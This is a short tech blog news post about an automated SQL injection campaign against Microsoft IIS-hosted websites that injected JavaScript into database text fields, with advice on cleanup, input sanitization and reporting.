| Friday August 1st 2014

Feedburner

Subscribe by email:

We promise not to spam/sell you.


Search Amazon deals:

Half A Million Microsoft-Powered Sites Hit With SQL Injection


exploits_of_a_mom.png

A new SQL injection attack aimed at Microsoft IIS web servers has hit some 500,000 websites, including the United Nations, UK Government sites and the U.S. Department of Homeland Security. While the attack is not necessarily Microsoft’s fault, it is unique to the company’s IIS server.

The automated attack takes advantage to the fact that Microsoft’s IIS servers allow generic commands that don’t require specific table-level arguments. However, the vulnerability is the result of poor data handling by the sites’ creators, rather than a specific Microsoft flaw.

In other words, there’s no patch that’s going to fix the issue, the problem is with the developers who failed follow well-established security practices for handling database input.

The attack itself injects some malicious JavaScript code into every text field in your database, the Javascript then loads an external script that can compromise a user’s PC.

Most of the larger sites affected have already long since repaired themselves and claim that the underlying problems in their code have been fixed. However, if you don’t want to take the chance there’s a simple way to avoid the problem — use Firefox with NoScript. Since the attack loads a script from a different domain, NoScript will stop it from running.

If your site has been affected you’re going to need to restore your database from a clean backup copy and start reviewing your code to make sure all input is properly sanitized, otherwise you’ll just get hit again. Should you not have a clean backup of you database hackademix.net has a workaround for rerunning the attack, but changing a couple lines to remove the injected JavaScript.

If you’ve been hit by the attack, you should, as Bill Sisk, Microsoft’s Trustworthy Computing, Response Communications Manager, suggests on his blog, report the attack.

Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov.

So far there have been no details about who is behind the attacks.

Source

Related Posts: On this day...

Leave a Reply

You must be logged in to post a comment.